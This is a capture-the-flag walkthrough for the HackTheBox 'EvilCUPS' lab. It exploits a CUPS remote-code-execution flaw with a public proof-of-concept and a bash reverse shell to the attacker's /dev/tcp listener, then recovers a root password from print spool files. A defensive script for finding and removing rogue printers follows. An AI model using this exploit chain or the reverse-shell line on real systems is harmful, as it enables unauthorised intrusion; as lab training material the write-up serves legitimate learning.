HackTheBox EvilCUPS Writeup
Explore the fundamentals of cybersecurity in the EvilCUPS Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
10.10.11.40 evilcups.htb
Script to add hosts automatically
ip="10.10.11.40"
domain="evilcups.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV evilcups.htb
Nmap scan report for evilcups.htb (10.10.11.40)
Host is up (0.052s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 36:49:95:03:8d:b4:4c:6e:a9:25:92:af:3c:9e:06:66 (ECDSA)
|_ 256 9f:a4:a9:39:11:20:e0:96:ee:c4:9a:69:28:95:0c:60 (ED25519)
631/tcp open ipp CUPS 2.4
|_http-title: Bad Request - CUPS v2.4.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can access the CUPS interface at http://10.10.11.40:631.
Remote Code Execution (RCE)
This attack is described in detail here:
https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
The proof of concept (PoC) was created by the room creator and can be found here:
https://github.com/IppSec/evil-cups
Start a Listener
Set up a listener to capture the reverse shell:
nc -lvnp 9001
Download and Set Up the Exploit
You’ll need the Python ippserver package for the CUPS exploit.
wget https://raw.githubusercontent.com/IppSec/evil-cups/refs/heads/main/evilcups.py -O evilcups
chmod +x evilcups
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
./evilcups $vpnip 10.10.11.40 'bash -c "nohup bash -i >& /dev/tcp/'$vpnip'/9001 0>&1"&'
Trigger the RCE
To trigger the reverse shell, go to the CUPS web interface at http://10.10.11.40:631. Find the added printer, click on “Maintenance,” and then click on “Print Test Page.”
Retrieve the User Flag
Once you have shell access, you can retrieve the user flag:
cat /home/htb/user.txt
Explore CUPS Spool Files
Navigate to the CUPS spool directory to inspect the files:
cd /var/spool/cups
cat d00001-001
Set up a Python HTTP server to transfer the file:
python3 -m http.server
Download and Convert the Spool File
On your local machine, download the spool file:
wget 'http://10.10.11.40:8000/d00001-001'
Convert the file to PDF format:
ps2pdf d00001-001 d00001-001.pdf
Open the PDF to inspect its contents:
xdg-open d00001-001.pdf
Retrieve the Root Password
With the information gathered, SSH into the box as root:
ssh root@10.10.11.40
Retrieve the root flag:
cat /root/root.txt
Good OpSec: Removing a Malicious Printer from CUPS
List Active Printers
Check which printers are currently active:
lpstat -p
Example:
printer Canon_MB2300_series is idle.
printer HACKED_10_10_14_2 is idle.
Attempt Printer Removal
Try to remove the malicious printer:
lpadmin -x HACKED_10_10_14_2
Restart CUPS
Apply changes by restarting the CUPS service:
systemctl restart cups
Verify Removal
Check again to ensure the printer is removed:
lpstat -p
Manual Removal (If Necessary)
If lpadmin fails, manually edit the printer configuration:
nano /etc/cups/printers.conf
Delete the section for the unwanted printer:
<Printer HACKED_10_10_14_2>
...
</Printer>
Save and exit (Ctrl + O, Ctrl + X).
Clear CUPS Cache
Remove the CUPS job cache:
rm /var/cache/cups/job.cache
Important: Only clear spool files if you are sure there’s no sensitive data:
rm /var/spool/cups/d* /var/spool/cups/c*
Note: On this machine, avoid removing spool files because they contain the password.
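The cleanup steps above (list printers, remove, restart, verify, and the manual printers.conf edit) can be scripted so the removal is checked rather than assumed. The following is an added example, not part of the original writeup or of the evil-cups project; the function names are my own, and the sample `lpstat -p` output and printers.conf content are constructed to match the printer names shown above. On a live box you would feed the functions real `lpstat -p` output and /etc/cups/printers.conf instead of the samples.

```shell
#!/bin/sh
# Added example: helpers for checking and cleaning up a rogue CUPS printer.
# Text-processing functions read from stdin so they can be exercised on the
# constructed samples below without touching a real CUPS installation.

# Constructed sample of `lpstat -p` output (not captured from the box).
SAMPLE_LPSTAT='printer Canon_MB2300_series is idle.  enabled since Mon 01 Jan 2024 00:00:00 UTC
printer HACKED_10_10_14_2 is idle.  enabled since Mon 01 Jan 2024 00:00:00 UTC'

# Constructed sample of /etc/cups/printers.conf, fields abbreviated.
SAMPLE_CONF='<DefaultPrinter Canon_MB2300_series>
Info Canon MB2300 series
State Idle
</Printer>
<Printer HACKED_10_10_14_2>
Info HACKED_10_10_14_2
State Idle
</Printer>'

# lpstat_printers: printer names from `lpstat -p` output read on stdin.
lpstat_printers() {
    awk '$1 == "printer" { print $2 }'
}

# suspicious_printers: names from `lpstat -p` output on stdin that match the
# extended regex in $1 (default: names beginning with HACKED_, as in this box).
suspicious_printers() {
    lpstat_printers | grep -E "${1:-^HACKED_}" || true
}

# conf_printers: names defined by <Printer ...> or <DefaultPrinter ...>
# blocks in a printers.conf read on stdin.
conf_printers() {
    sed -n 's/^<\(Default\)\{0,1\}Printer \([^>]*\)>$/\2/p'
}

# strip_printer_block: copy a printers.conf from stdin to stdout, dropping the
# whole block for printer $1 (the manual nano edit done non-interactively).
strip_printer_block() {
    awk -v name="$1" '
        $0 == "<Printer " name ">" || $0 == "<DefaultPrinter " name ">" { skip = 1 }
        !skip { print }
        skip && $0 == "</Printer>" { skip = 0 }
    '
}

# remove_and_verify: run lpadmin -x for printer $1, restart cups where a
# service manager exists, and return 0 only if the printer is really gone.
# Not called in the dry run below; it is the live-box version of the steps.
remove_and_verify() {
    name="$1"
    lpadmin -x "$name" 2>/dev/null || true
    if command -v systemctl >/dev/null 2>&1; then
        systemctl restart cups 2>/dev/null || true
    fi
    if lpstat -p 2>/dev/null | lpstat_printers | grep -qxF "$name"; then
        printf 'printer %s still present; edit /etc/cups/printers.conf by hand\n' "$name" >&2
        return 1
    fi
    return 0
}

# Dry run over the constructed samples (no lpadmin or systemctl calls):
# which printers look suspicious, and what remains after stripping one block.
printf '%s\n' "$SAMPLE_LPSTAT" | suspicious_printers
printf '%s\n' "$SAMPLE_CONF" | strip_printer_block HACKED_10_10_14_2 | conf_printers
```

The dry run prints `HACKED_10_10_14_2` from the lpstat sample and `Canon_MB2300_series` as the only printer left in the stripped configuration. Because `remove_and_verify` re-reads `lpstat -p` after `lpadmin -x`, a non-zero return is the signal to fall back to editing printers.conf (for which `strip_printer_block` writes the edited file to stdout, so redirect it to a temporary file and replace the original only after reviewing it).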